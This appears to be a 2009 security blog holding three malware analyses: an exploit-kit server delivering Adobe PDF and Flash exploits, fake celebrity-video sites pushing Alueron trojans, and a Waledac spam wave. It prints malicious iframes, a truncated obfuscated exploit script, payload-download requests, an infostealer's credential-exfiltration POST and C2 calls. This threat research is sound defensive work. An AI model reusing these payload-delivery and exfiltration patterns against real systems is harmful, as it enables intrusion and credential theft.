Sunday, July 26, 2009

91.212.198.37 Badness

IP/Domain Analysis

IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.

inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered

organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered

The IP 91.212.198.37 currently maps to the following domains.

• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn

The domain delzzerro.cn was registered on 17 July 2009.

Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17

The domain updatedate.cn was registered on 8 July 2009.

Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51

The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.

https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

www.delzzerro.cn Analysis

The HTTP request for www.delzzerro.cn returns and iframe and script redirect.

<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>

http://www.delzzerro.cn/pic/p2.php

The request for p2.php returns a PDF file.

GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf

36.pdf

File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9

The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://www.delzzerro.cn/pic/vq.png

The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

http://delzzerro.cn/pic/uzp.php

The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.

GET /pic/uzp.php
Host: delzzerro.cn

HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

http://91.212.198.37 Analysis

The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.

<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>

http://91.212.198.37/img/p2.php

The request for p2.php returns a PDF file.

GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37

HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf


119.pdf


File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9

The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://91.212.198.37/img/vw.png

The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

updatedate.cn/img/uzt.php

The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.

GET /img/uzt.php
Host: updatedate.cn

HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

Malware Analysis

installb.exe

The malware installb.exe creates:

• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.

File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE

ThreatExpert
VirusTotal (4/41 current detection)

The malware installb.exe creates the following files:

C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe

File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9

C:\WINDOWS\system32\braviax.exe

File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD

VirusTotal (17/41 current detection)

C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)

C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys

File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741

VirusTotal (20/38 current detection)

C:\WINDOWS\system32\Wbem\proquota.exe

File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7

ThreatExpert
VirusTotal (5/41 current detection)

proquota.exe (PWS:Win32/Daurso)

The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).

POST /ptf/receiver/online HTTP/1.1
Host: squatead.com

The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.

POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg


Trojan.Virantix.C


The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.

Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20

Home Antivirus 2010 installer download.

GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2


GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";

The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.

File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E

ThreatExpert

The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.

GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1

The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.

Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20



An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.



The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:

*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com

GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com

The iejwn download creates c:\alurm.exe.

File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846

ThreatExpert

GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com

GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com

Tuesday, July 21, 2009

Erin Andrews Peepshow Gone Bad?

Fox News and other media outlets are reporting ESPN sportscaster hottie Erin Andrews was a victim of a severe invasion of privacy. Per Fox News, "Sexy ESPN sportscaster Erin Andrews was the target of a peephole pervert who surreptitiously shot a video of her walking around her hotel room naked -- and posted it on the Internet."

So what happens next? Tons of people search for the video before it is pulled by authorities and cyber criminals race to put up rogue exploit sites tied to common internet searches. As an example, the Google search for "Erin Andrews video nude" results in a hit for http://digg.com/celebrity/Naked_Erin_Andrews_SEX_TAPE_online_free.

The digg.com link had comments with hyperlinks to the following sites (note: the sites seem to consistently change)

http://video.report-cnn.com/Erin_Andrews_Peephole_Video (7/20/09)
http://sexy-top-news.com/show.php?id=Erin_Andrews (7/21/09)
http://vsj-news.com/video.php?vid=erin_andrews_peephole_video (7/21/09)



So lets follow the links to see the video :)

video.report-cnn.com (72.232.116.51)

Wow, CNN Video has the video!



All I need to do is download this Live Video Player!



MediaPlayer.exe seems legitimate.



No movie :( - what happened???

The file MediaPlayer.exe was downloaded from simplexdoom.com (91.214.45.73).

GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

File: MediaPlayer.exe
Size: 86715
MD5: 9D05428AE376A369798B126358B74150

Per ThreatExpert, MediaPlayer.exe installs several Alueron malware components. Per CA, "Alueron is a family of trojans with a variety of components that can download and execute arbitrary files, hijack the browser to display fake web pages, and report affected user's queries performed with popular search engines."

During analysis, the Alueron malware made the following C2 connections.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Let's try again, it has to be out there.

vsj-news.com (174.36.240.140)

VSJ News has to have the video. All I need is a Flash video codec plugin!



FlashCodecPlugin.exe looks good!



No movie again :(

The file FlashCodecPlugin.exe was downloaded from bigdron.com (91.214.45.73).

GET http:///bigdron.com/download/6936413148673d3d4ae1782e20090701/FlashCodecPlugin.exe
Referer: http://vsj-news.com/video.php?vid=erin_andrews_peephole_video

File: FlashCodecPlugin.exe
Size: 88514
MD5: 87CFCC91FB9934E55D3C969997D2BDC1

Per ThreatExpert, FlashCodecPlugin.exe also installs several Alueron malware components.

The FlashCodecPlugin.exe Alueron malware also connects to the same C2 sites.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Well, so much for the video. Let's examine some of the domains and IP addresses associated with the Alueron malware.

Domain/IP Analysis

report-cnn.com [hosts fake video requiring codec] currently resolves to 72.232.116.51 (AS22576, Layered Technologies, US). Several other suspect domains currently resolve to 72.232.116.51:

bestcasinochat.com
bestcasinogroup.com
bestworldwidecasino.com
casinogametime.net
cavers.net
celeb-sextapes.info
chudnoj.com
darkblog.org
eblogic.com
extraspray.com
fashionclubcasino.net
ffssa.com
finadvisenow.com
finquotenow.com
flplace.com
freepornsearcher.net
freesexsearcher.net
inacall.com
kittyclubcasino.com
lenma.com
mediaplayer.4upd.com
medicalc.net
mifomatic.com
mortagequotenow.com
oops-boobs.com
pornomixer.ru
report-cnn.com
rosem.biz
sexy-babes-zone.com
sleepingbabe.info
smut-xxx.com
totalautoblog.com
truetrick.net
video.report-cnn.com
webartcreative.com
www.chudnoj.com
www.free-incest-movies.net
www.pornomixer.ru
www.sleepingbabe.info
www.xesdn.ru
x-light.info
xesdn.ru

simplexdoom.com [fake codec malware download site] currently resolves to 91.214.45.73 (AS44042, eSolutions, Belize). Several other suspect domains currently resolve to 91.214.45.73:

*.allincorx.com
*.bigdron.com
*.cikaredo.com
*.operationelx.com
*.oxxadox.com
*.paxxtiger.com
*.rstdeals.com
*.simplexdoom.com
allincorx.com
bigdron.com
cikaredo.com
detailedus.com
ns1.allincorx.com
ns1.bigdron.com
ns1.cikaredo.com
ns1.operationelx.com
ns1.oxxadox.com
ns1.paxxtiger.com
ns1.rstdeals.com
ns1.simplexdoom.com
ns2.allincorx.com
ns2.bigdron.com
ns2.cikaredo.com
ns2.operationelx.com
ns2.oxxadox.com
ns2.paxxtiger.com
ns2.rstdeals.com
ns2.simplexdoom.com
operationelx.com
oxxadox.com
paxxtiger.com
rstdeals.com
simplexdoom.com

vsj-news.com [hosts fake video requiring codec] currently resolves to 174.36.240.140 (AS36351, SOFTLAYER Technologies Inc., US). Several other suspect domains currently resolve to 174.36.240.140:

24kadra.net
avado.ru
bestdom2.ru
domivo4ka.com
gliant.com
kontaktzlo.ru
kozenko.ru
kurortnik.com.ua
livedom2.ru
simpletv.net
softlayer.org.ru
svet999.ru
vsj-news.com
wmsoft.ru
www.24kadra.net
www.bestdom2.ru
www.kurortnik.com.ua
www.livedom2.ru
www.simpletv.net
www.svet999.ru
ylati.ru

sexy-top-news.com [listed at digg.com, but down at the time of analysis] currently resolves to 195.88.191.21 (AS22576, Bigness Group Ltd., Russia). Several other suspect domains currently resolve to 195.88.191.21:

empire-of-tops.com
sexy-top-news.com
shocking-stars.net
video-trailers.net

Bottom line: social engineering tactics surrounding current events and pornographic material continue to be a preferred TTP for cyber criminals. There is no need to come up with exploit code, when users continue to "choose" to install malware themselves.

Wednesday, July 8, 2009

Waledac - July 4th Wave

Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:

fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com

The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:

112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23

sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.

Malware Analysis

File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E

The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe

The following are samples of initial connections to various Waledac controllers.

POST /rbbcrx.png
Host: 119.77.219.219

POST /lbohwj.png
Host: 98.25.97.68

POST / HTTP/1.1
Host: 93.100.114.158

POST /xdryoc.htm
Host: 134.155.241.188

POST /mzrbflwkczf.png
Host: 93.100.114.158